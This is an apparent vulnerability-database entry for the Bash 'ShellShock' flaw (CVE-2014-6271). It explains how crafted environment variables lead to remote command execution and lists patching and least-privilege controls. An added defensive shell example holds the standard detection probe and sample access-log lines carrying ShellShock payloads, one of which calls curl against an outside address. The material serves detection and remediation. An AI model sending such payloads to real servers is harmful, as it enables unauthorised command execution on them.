CVE-2014-6271
Published: 24 September 2014
Summary
CVE-2014-6271, widely known as "ShellShock", is a critical-severity OS Command Injection (CWE-78) vulnerability in GNU Bash through 4.3; this entry lists IBM QRadar Security Information and Event Manager as the affected product. Its CVSS base score is 9.8 (Critical).
Operationally, it ranks at the very top of all CVEs by exploit likelihood (the page rounds its percentile to the top 0.0%); CISA has added it to the Known Exploited Vulnerabilities catalog (28 January 2022); and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and AC-6 (Least Privilege).
Deeper analysis
GNU Bash through 4.3 imports shell functions from environment variables whose values begin with "() {", and it keeps parsing and executing whatever follows the closing brace of that function definition. The flaw is in the Bash shell itself, so it surfaces wherever an untrusted party can set environment variables that a Bash process later inherits across a privilege boundary: OpenSSH's ForceCommand feature (sshd passes client-controlled values into the forced command's environment), Apache HTTP Server's mod_cgi and mod_cgid modules (request headers such as User-Agent become HTTP_* variables for the CGI script), certain DHCP client hook scripts (option values supplied by a rogue DHCP server), and similar configurations.
A remote attacker who can set such a variable gets arbitrary command execution with the privileges of the process that invoked Bash, with no authentication or user interaction. That is what the CVSS 9.8 rating encodes: network vector, low complexity, no privileges or interaction required, and High impact to confidentiality, integrity and availability (full read, write and execute in the context of the exposed process).
The initial upstream fix for this issue was incomplete, so CVE-2014-7169 was assigned to the residual vulnerability; a system patched for CVE-2014-6271 alone must be checked against that CVE as well. Vendor and coordinator advisories (Mageia, Juniper, JVN and related sources) document the necessary updates and configuration changes.
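The probe and the log check below are an added example, not code from the original page or from any vendor it cites. shellshock_check runs the widely circulated one-line test for CVE-2014-6271 against a Bash binary, and shellshock_scan_log counts web-server access-log lines carrying the "() {" marker that every ShellShock payload needs, which is what the malicious-code detection control under Mitigating Controls amounts to at the web tier. The log lines are constructed for this example, and the function and file names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original page or from any of the vendors it
# cites. Two POSIX sh helpers:
#   shellshock_check    - the widely circulated one-line probe for CVE-2014-6271
#   shellshock_scan_log - counts web-server log lines carrying the "() {" marker
# The log lines written by make_sample_log are constructed for this example.

# Usage: shellshock_check [path-to-bash]
# Prints "vulnerable", "patched" or "unknown" and returns 0, 1 or 2.
shellshock_check() {
    bash_bin=${1:-$(command -v bash 2>/dev/null)}
    if [ -z "$bash_bin" ] || [ ! -x "$bash_bin" ]; then
        echo unknown
        return 2
    fi
    # The value of x starts with "() {", so Bash imports it as a function named
    # x at startup. Bash through 4.3 keeps parsing after the closing brace and
    # executes the trailing "echo vulnerable" while importing the environment,
    # before the -c command runs. A fixed Bash prints only "probe".
    out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo probe' 2>/dev/null)
    case $out in
        *vulnerable*) echo vulnerable; return 0 ;;
        *)            echo patched;    return 1 ;;
    esac
}

# Usage: make_sample_log <file>
# Writes three constructed Apache-style access-log lines. Under mod_cgi the
# request headers reach the script as environment variables (User-Agent becomes
# HTTP_USER_AGENT, Referer becomes HTTP_REFERER), which is why the payload is
# delivered in those fields.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'id'"
10.0.0.6 - - [25/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { x;}; /usr/bin/curl http://198.51.100.9/x" "-"
EOF
}

# Usage: shellshock_scan_log <logfile>
# Prints the number of lines containing the function-definition marker. The
# fixed string "() {" is the part of every ShellShock payload that cannot be
# left out, whatever command follows it; grep -F keeps the braces literal.
shellshock_scan_log() {
    grep -c -F '() {' "$1"
}
```

A result of "patched" means only that this probe's trailing command did not run; the first upstream fix still left CVE-2014-7169, so confirm the installed Bash version against the vendor advisory rather than relying on the probe alone. A hit in an access log shows that a payload arrived, not that the target script actually invoked Bash, so treat the count as an alerting signal to be followed up on the host.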
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2014-6157
Vulnerability details
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
- CWE(s): CWE-78 (OS Command Injection)
- KEV Date Added: 28 January 2022
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): directly requires timely installation of vendor patches that correct the Bash function-definition parsing flaw enabling unauthenticated remote code execution.
- AC-6 (Least Privilege): limits privileges of processes (sshd ForceCommand, Apache CGI, DHCP clients) that receive attacker-supplied environment variables, reducing the impact of successful exploitation.
- SI-3 (Malicious Code Protection): deploys malicious-code detection mechanisms that can block or alert on the arbitrary commands injected through crafted Bash environment variables.